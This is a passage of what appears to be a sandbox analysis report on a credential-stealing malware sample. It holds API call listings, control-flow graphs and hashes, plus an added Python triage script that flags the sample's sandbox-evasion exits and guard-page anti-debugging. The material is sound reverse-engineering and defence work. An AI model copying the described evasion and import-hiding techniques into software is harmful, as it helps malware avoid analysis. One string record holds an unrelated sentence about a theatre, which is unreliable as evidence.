                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: b377ce69c6db294a7431d896ed45ca84488d64ae1a5fa3604c7761b70bdd4126
                                  • Instruction ID: 2f4dea81dcd154b73f57f6e9255346187af6eaf0a8ea54750c3e4193a45f137a
                                  • Opcode Fuzzy Hash: b377ce69c6db294a7431d896ed45ca84488d64ae1a5fa3604c7761b70bdd4126
                                  • Instruction Fuzzy Hash: 2471B731540215AFD721ABB1DC4DBAF367AAF44741F08913AF906A72E1DF78E901CB64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks by node id; "-> N" lists successor blocks)
                                  • 2850: 3e4a60-3e4afc RtlAllocateHeap -> 2867, 2868
                                  • 2867: 3e4afe-3e4b03 -> 2869
                                  • 2868: 3e4b7a-3e4bbe VirtualProtect (function exit)
                                  • 2869: 3e4b06-3e4b78 -> 2868
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E4AA2
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 003E4BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: f9c1527e12aaf588a7e85b5b68a6e7083cb9e3a818d2c42a28dbde8d1ac8a2e5
                                  • Instruction ID: b01273db38b7b99281092c41a44612a0aeb843680016f17061445e5f8026539b
                                  • Opcode Fuzzy Hash: f9c1527e12aaf588a7e85b5b68a6e7083cb9e3a818d2c42a28dbde8d1ac8a2e5
                                  • Instruction Fuzzy Hash: 3131F8B8BA022C769620EBFF4C47FDF6E55DFC5B60B21405375087B180C9A95680CAAA
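                                  The function records above show three things worth pulling out of a Joe Sandbox API listing mechanically: the loader at 00406390/004066E0 resolves its imports at run time against a handful of module bases (most names are passed as heap pointers, a few such as NtQueryInformationProcess and CreateDesktopA are visible in clear text); the entry function at 00401BF0 runs environment probes (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserDefaultLangID) each followed directly by ExitProcess; and the routine at 003E4A60 calls VirtualProtect with 0x100, which is PAGE_GUARD. The script below is an added example written for this page, not Joe Sandbox or Stealc code. Its input is a constructed subset of the API lines printed on this page, and it assumes Joe Sandbox prints arguments in prototype order, so that the third VirtualProtect argument is flNewProtect.

```python
"""Triage helper for the per-function "APIs" listings of a Joe Sandbox report.

Added example (not part of the report or of the analysed sample). It answers:
  1. against which module bases the loader resolves imports, and which export
     names appear in clear text;
  2. which environment probes are immediately followed by ExitProcess
     (the sandbox/VM bail-out pattern);
  3. which VirtualProtect calls set PAGE_GUARD (guard-page anti-debugging).
"""
import re
from collections import defaultdict

# Constructed input: a subset of the API lines printed on this page, copied
# verbatim. Nothing here was captured from a fresh run of the sample.
SAMPLE_API_LINES = """
• GetProcAddress.KERNEL32(76210000,011A17C0), ref: 004063E9
• GetProcAddress.KERNEL32(76210000,011A1778), ref: 00406402
• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004066CC
• LoadLibraryA.KERNEL32(011A1808,?,?,?,00401C03), ref: 004065C9
• GetSystemInfo.KERNEL32(?), ref: 00401C71
• ExitProcess.KERNEL32 ref: 00401C7F
  • Part of subcall function 003E1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003E1046
  • Part of subcall function 003E1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 003E104D
  • Part of subcall function 003E1030: ExitProcess.KERNEL32 ref: 003E1058
  • Part of subcall function 003E10C0: GlobalMemoryStatusEx.KERNEL32 ref: 003E10EA
  • Part of subcall function 003E10C0: ExitProcess.KERNEL32 ref: 003E1114
• GetUserDefaultLangID.KERNEL32 ref: 00401C8F
• ExitProcess.KERNEL32 ref: 00401CB2
• VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 003E4BB0
• GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00406ED7
"""

# One listing line: optional bullet, optional "Part of subcall function X:",
# then Api.MODULE(args), ref: ADDRESS. The parenthesised argument list is
# absent for calls Joe Sandbox logs without arguments (e.g. ExitProcess).
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")  # an 8-digit value is an address, not a name


def parse_api_lines(text):
    """Return the calls in listing order as dicts with api, module, args, ref."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def import_resolution_summary(calls):
    """Group GetProcAddress calls by module base; keep names that are clear text."""
    summary = defaultdict(lambda: {"count": 0, "named": []})
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        base, name = c["args"][0], c["args"][1]
        summary[base]["count"] += 1
        if name != "?" and not HEX8.match(name):
            summary[base]["named"].append(name)
    return dict(summary)


# Probes this sample issues before deciding whether to keep running.
PROBE_APIS = {"GetSystemInfo", "VirtualAllocExNuma",
              "GlobalMemoryStatusEx", "GetUserDefaultLangID"}


def evasion_checks(calls):
    """Flag probe calls whose very next listed call is ExitProcess."""
    return [(cur["api"], cur["ref"], nxt["ref"])
            for cur, nxt in zip(calls, calls[1:])
            if cur["api"] in PROBE_APIS and nxt["api"] == "ExitProcess"]


# Win32 memory-protection constants (winnt.h).
PAGE_FLAGS = [
    (0x001, "PAGE_NOACCESS"), (0x002, "PAGE_READONLY"), (0x004, "PAGE_READWRITE"),
    (0x008, "PAGE_WRITECOPY"), (0x010, "PAGE_EXECUTE"), (0x020, "PAGE_EXECUTE_READ"),
    (0x040, "PAGE_EXECUTE_READWRITE"), (0x080, "PAGE_EXECUTE_WRITECOPY"),
    (0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"),
]
PAGE_GUARD = 0x100


def decode_protect(flags):
    """Name every protection bit set in a flNewProtect/flProtect value."""
    return [name for bit, name in PAGE_FLAGS if flags & bit]


def guard_page_calls(calls):
    """Refs of VirtualProtect calls whose flNewProtect includes PAGE_GUARD.

    Assumption: arguments are printed in prototype order, i.e.
    VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect).
    """
    refs = []
    for c in calls:
        if c["api"] != "VirtualProtect" or len(c["args"]) < 3:
            continue
        prot = c["args"][2]
        if HEX8.match(prot) and int(prot, 16) & PAGE_GUARD:
            refs.append(c["ref"])
    return refs


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for base, e in sorted(import_resolution_summary(calls).items()):
        print(f"module base {base}: {e['count']} GetProcAddress calls, clear-text names {e['named']}")
    for api, probe_ref, exit_ref in evasion_checks(calls):
        print(f"probe {api} at {probe_ref:08X} is followed by ExitProcess at {exit_ref:08X}")
    for ref in guard_page_calls(calls):
        print(f"VirtualProtect at {ref:08X} sets PAGE_GUARD")
```

The probe-then-ExitProcess rule keys on listing order rather than on the control-flow graph, so it is a cheap first pass, not proof of a check: confirm each hit against the graph (here 2157 -> 2159, 2158 -> 2164 -> 2166 and the subcalls at 003E1030/003E10C0 all terminate in ExitProcess). The module bases are left as raw hex because the report never names the DLLs behind them; the clear-text names resolved from 77310000 and 76910000 are the only hard evidence of what those bases are.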
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00402A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2763dc03a11714edd128675ad5adc4041c2c70b80c6238f3595e2d5dd204c87e
                                  • Instruction ID: c10538853dd1005a3df4342557b5d3a6b44513e3e9914ac91ab69eea21aba3c2
                                  • Opcode Fuzzy Hash: 2763dc03a11714edd128675ad5adc4041c2c70b80c6238f3595e2d5dd204c87e
                                  • Instruction Fuzzy Hash: DCF0B4B1A40204AFC700DF88DD49B9EBBBCF708B21F10022BF915E3280D774190487A1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks by node id; "-> N" lists successor blocks)
                                  • 633: 4066e0-4066e7 -> 634, 635
                                  • 634: 4066ed-406af9 GetProcAddress * 43 -> 635
                                  • 635: 406afe-406b92 LoadLibraryA * 8 -> 636, 637
                                  • 636: 406b94-406c03 GetProcAddress * 5 -> 637
                                  • 637: 406c08-406c0f -> 638, 639
                                  • 638: 406cd2-406cd9 -> 640, 641
                                  • 639: 406c15-406ccd GetProcAddress * 8 -> 638
                                  • 640: 406cdb-406d4a GetProcAddress * 5 -> 641
                                  • 641: 406d4f-406d56 -> 642, 643
                                  • 642: 406de9-406df0 -> 644, 645
                                  • 643: 406d5c-406de4 GetProcAddress * 6 -> 642
                                  • 644: 406f10-406f17 -> 646, 647
                                  • 645: 406df6-406f0b GetProcAddress * 12 -> 644
                                  • 646: 406f19-406f88 GetProcAddress * 5 -> 647
                                  • 647: 406f8d-406f94 -> 648, 649
                                  • 648: 406fc1-406fc8 -> 650, 651
                                  • 649: 406f96-406fbc GetProcAddress * 2 -> 648
                                  • 650: 406ff5-406ffc -> 652, 653
                                  • 651: 406fca-406ff0 GetProcAddress * 2 -> 650
                                  • 652: 407002-4070e8 GetProcAddress * 10 -> 653
                                  • 653: 4070ed-4070f4 -> 654, 655
                                  • 654: 407152-407159 -> 656, 657
                                  • 655: 4070f6-40714d GetProcAddress * 4 -> 654
                                  • 656: 40715b-407169 GetProcAddress -> 657
                                  • 657: 40716e-407175 -> 658, 659
                                  • 658: 4071d3 (function exit)
                                  • 659: 407177-4071ce GetProcAddress * 4 -> 658
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,01196518), ref: 004066F5
                                  • GetProcAddress.KERNEL32(76210000,011964D8), ref: 0040670D
                                  • GetProcAddress.KERNEL32(76210000,011A8F40), ref: 00406726
                                  • GetProcAddress.KERNEL32(76210000,011A8CE8), ref: 0040673E
                                  • GetProcAddress.KERNEL32(76210000,011A8D18), ref: 00406756
                                  • GetProcAddress.KERNEL32(76210000,011AF080), ref: 0040676F
                                  • GetProcAddress.KERNEL32(76210000,0119A6C0), ref: 00406787
                                  • GetProcAddress.KERNEL32(76210000,011AEFC0), ref: 0040679F
                                  • GetProcAddress.KERNEL32(76210000,011AEF30), ref: 004067B8
                                  • GetProcAddress.KERNEL32(76210000,011AF008), ref: 004067D0
                                  • GetProcAddress.KERNEL32(76210000,011AF0B0), ref: 004067E8
                                  • GetProcAddress.KERNEL32(76210000,011967D8), ref: 00406801
                                  • GetProcAddress.KERNEL32(76210000,011964F8), ref: 00406819
                                  • GetProcAddress.KERNEL32(76210000,011966D8), ref: 00406831
                                  • GetProcAddress.KERNEL32(76210000,01196578), ref: 0040684A
                                  • GetProcAddress.KERNEL32(76210000,011AEF90), ref: 00406862
                                  • GetProcAddress.KERNEL32(76210000,011AEFD8), ref: 0040687A
                                  • GetProcAddress.KERNEL32(76210000,0119A620), ref: 00406893
                                  • GetProcAddress.KERNEL32(76210000,01196738), ref: 004068AB
                                  • GetProcAddress.KERNEL32(76210000,011AEFF0), ref: 004068C3
                                  • GetProcAddress.KERNEL32(76210000,011AEF48), ref: 004068DC
                                  • GetProcAddress.KERNEL32(76210000,011AF020), ref: 004068F4
                                  • GetProcAddress.KERNEL32(76210000,011AF0C8), ref: 0040690C
                                  • GetProcAddress.KERNEL32(76210000,01196758), ref: 00406925
                                  • GetProcAddress.KERNEL32(76210000,011AF098), ref: 0040693D
                                  • GetProcAddress.KERNEL32(76210000,011AEFA8), ref: 00406955
                                  • GetProcAddress.KERNEL32(76210000,011AF0E0), ref: 0040696E
                                  • GetProcAddress.KERNEL32(76210000,011AF038), ref: 00406986
                                  • GetProcAddress.KERNEL32(76210000,011AEF60), ref: 0040699E
                                  • GetProcAddress.KERNEL32(76210000,011AF050), ref: 004069B7
                                  • GetProcAddress.KERNEL32(76210000,011AEF78), ref: 004069CF
                                  • GetProcAddress.KERNEL32(76210000,011AF068), ref: 004069E7
                                  • GetProcAddress.KERNEL32(76210000,011AEB40), ref: 00406A00
                                  • GetProcAddress.KERNEL32(76210000,0119FE58), ref: 00406A18
                                  • GetProcAddress.KERNEL32(76210000,011AEB10), ref: 00406A30
                                  • GetProcAddress.KERNEL32(76210000,011AEA38), ref: 00406A49
                                  • GetProcAddress.KERNEL32(76210000,011967B8), ref: 00406A61
                                  • GetProcAddress.KERNEL32(76210000,011AEBB8), ref: 00406A79
                                  • GetProcAddress.KERNEL32(76210000,01196538), ref: 00406A92
                                  • GetProcAddress.KERNEL32(76210000,011AE960), ref: 00406AAA
                                  • GetProcAddress.KERNEL32(76210000,011AE9D8), ref: 00406AC2
                                  • GetProcAddress.KERNEL32(76210000,011965B8), ref: 00406ADB
                                  • GetProcAddress.KERNEL32(76210000,011965D8), ref: 00406AF3
                                  • LoadLibraryA.KERNEL32(011AEBD0,0040051F), ref: 00406B05
                                  • LoadLibraryA.KERNEL32(011AE978), ref: 00406B16
                                  • LoadLibraryA.KERNEL32(011AEB88), ref: 00406B28
                                  • LoadLibraryA.KERNEL32(011AEBA0), ref: 00406B3A
                                  • LoadLibraryA.KERNEL32(011AE990), ref: 00406B4B
                                  • LoadLibraryA.KERNEL32(011AE9C0), ref: 00406B5D
                                  • LoadLibraryA.KERNEL32(011AEC18), ref: 00406B6F
                                  • LoadLibraryA.KERNEL32(011AE9A8), ref: 00406B80
                                  • GetProcAddress.KERNEL32(751E0000,011963F8), ref: 00406B9C
                                  • GetProcAddress.KERNEL32(751E0000,011AEB70), ref: 00406BB4
                                  • GetProcAddress.KERNEL32(751E0000,011A8BD8), ref: 00406BCD
                                  • GetProcAddress.KERNEL32(751E0000,011AEA50), ref: 00406BE5
                                  • GetProcAddress.KERNEL32(751E0000,01196438), ref: 00406BFD
                                  • GetProcAddress.KERNEL32(70170000,0119A8C8), ref: 00406C1D
                                  • GetProcAddress.KERNEL32(70170000,01196318), ref: 00406C35
                                  • GetProcAddress.KERNEL32(70170000,0119A648), ref: 00406C4E
                                  • GetProcAddress.KERNEL32(70170000,011AE9F0), ref: 00406C66
                                  • GetProcAddress.KERNEL32(70170000,011AEA08), ref: 00406C7E
                                  • GetProcAddress.KERNEL32(70170000,01196458), ref: 00406C97
                                  • GetProcAddress.KERNEL32(70170000,01196298), ref: 00406CAF
                                  • GetProcAddress.KERNEL32(70170000,011AEC00), ref: 00406CC7
                                  • GetProcAddress.KERNEL32(753A0000,01196118), ref: 00406CE3
                                  • GetProcAddress.KERNEL32(753A0000,011964B8), ref: 00406CFB
                                  • GetProcAddress.KERNEL32(753A0000,011AEBE8), ref: 00406D14
                                  • GetProcAddress.KERNEL32(753A0000,011AEA20), ref: 00406D2C
                                  • GetProcAddress.KERNEL32(753A0000,01196478), ref: 00406D44
                                  • GetProcAddress.KERNEL32(76310000,0119A940), ref: 00406D64
                                  • GetProcAddress.KERNEL32(76310000,0119A7B0), ref: 00406D7C
                                  • GetProcAddress.KERNEL32(76310000,011AEAF8), ref: 00406D95
                                  • GetProcAddress.KERNEL32(76310000,011960D8), ref: 00406DAD
                                  • GetProcAddress.KERNEL32(76310000,01196378), ref: 00406DC5
                                  • GetProcAddress.KERNEL32(76310000,0119A968), ref: 00406DDE
                                  • GetProcAddress.KERNEL32(76910000,011AEAE0), ref: 00406DFE
                                  • GetProcAddress.KERNEL32(76910000,01196178), ref: 00406E16
                                  • GetProcAddress.KERNEL32(76910000,011A8C68), ref: 00406E2F
                                  • GetProcAddress.KERNEL32(76910000,011AEB58), ref: 00406E47
                                  • GetProcAddress.KERNEL32(76910000,011AE930), ref: 00406E5F
                                  • GetProcAddress.KERNEL32(76910000,011962B8), ref: 00406E78
                                  • GetProcAddress.KERNEL32(76910000,011961D8), ref: 00406E90
                                  • GetProcAddress.KERNEL32(76910000,011AEA98), ref: 00406EA8
                                  • GetProcAddress.KERNEL32(76910000,011AE948), ref: 00406EC1
                                  • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00406ED7
                                  • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00406EEE
                                  • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00406F05
                                  • GetProcAddress.KERNEL32(75B30000,01196198), ref: 00406F21
                                  • GetProcAddress.KERNEL32(75B30000,011AEA68), ref: 00406F39
                                  • GetProcAddress.KERNEL32(75B30000,011AEB28), ref: 00406F52
                                  • GetProcAddress.KERNEL32(75B30000,011AEA80), ref: 00406F6A
                                  • GetProcAddress.KERNEL32(75B30000,011AEAB0), ref: 00406F82
                                  • GetProcAddress.KERNEL32(75670000,011961F8), ref: 00406F9E
                                  • GetProcAddress.KERNEL32(75670000,01196418), ref: 00406FB6
                                  • GetProcAddress.KERNEL32(76AC0000,011960F8), ref: 00406FD2
                                  • GetProcAddress.KERNEL32(76AC0000,011AEAC8), ref: 00406FEA
                                  • GetProcAddress.KERNEL32(6F4E0000,01196498), ref: 0040700A
                                  • GetProcAddress.KERNEL32(6F4E0000,01196398), ref: 00407022
                                  • GetProcAddress.KERNEL32(6F4E0000,01196338), ref: 0040703B
                                  • GetProcAddress.KERNEL32(6F4E0000,011AEF18), ref: 00407053
                                  • GetProcAddress.KERNEL32(6F4E0000,011961B8), ref: 0040706B
                                  • GetProcAddress.KERNEL32(6F4E0000,01196218), ref: 00407084
                                  • GetProcAddress.KERNEL32(6F4E0000,011962F8), ref: 0040709C
                                  • GetProcAddress.KERNEL32(6F4E0000,011963D8), ref: 004070B4
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004070CB
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004070E2
                                  • GetProcAddress.KERNEL32(75AE0000,011AEE10), ref: 004070FE
                                  • GetProcAddress.KERNEL32(75AE0000,011A8C28), ref: 00407116
                                  • GetProcAddress.KERNEL32(75AE0000,011AEE58), ref: 0040712F
                                  • GetProcAddress.KERNEL32(75AE0000,011AECA8), ref: 00407147
                                  • GetProcAddress.KERNEL32(76300000,01196138), ref: 00407163
                                  • GetProcAddress.KERNEL32(6E950000,011AEC30), ref: 0040717F
                                  • GetProcAddress.KERNEL32(6E950000,01196158), ref: 00407197
                                  • GetProcAddress.KERNEL32(6E950000,011AED38), ref: 004071B0
                                  • GetProcAddress.KERNEL32(6E950000,011AEDF8), ref: 004071C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ff89fa2fecd0eab2d02de931896702a2f54c975076d6e5443439f3b3a07553b0
                                  • Instruction ID: 4356d31b1ffc5f649f3fdf46d476b227c3fbb1c5134d47668a57121c3a8cac3d
                                  • Opcode Fuzzy Hash: ff89fa2fecd0eab2d02de931896702a2f54c975076d6e5443439f3b3a07553b0
                                  • Instruction Fuzzy Hash: 44626FB5A10200AFD754DF65ECA8AA637BBF78D746318E92FE91583360DB349841DB30
                                  APIs
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF1D5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF1F1
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF1FC
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF215
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003FF220
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF239
                                  • lstrcpy.KERNEL32(00000000,00414FA0), ref: 003FF25E
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF28C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF2C0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FF2F0
                                  • lstrlen.KERNEL32(01196798), ref: 003FF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: b930a3216fbe5d38116a69d6a4b990c00cf28654999faabd89b5afcacdd663fd
                                  • Instruction ID: 1d5daeb5c0c09b1494e8eb10c0058f7e4850e78093c5de2b7bd2c411db7ce6ec
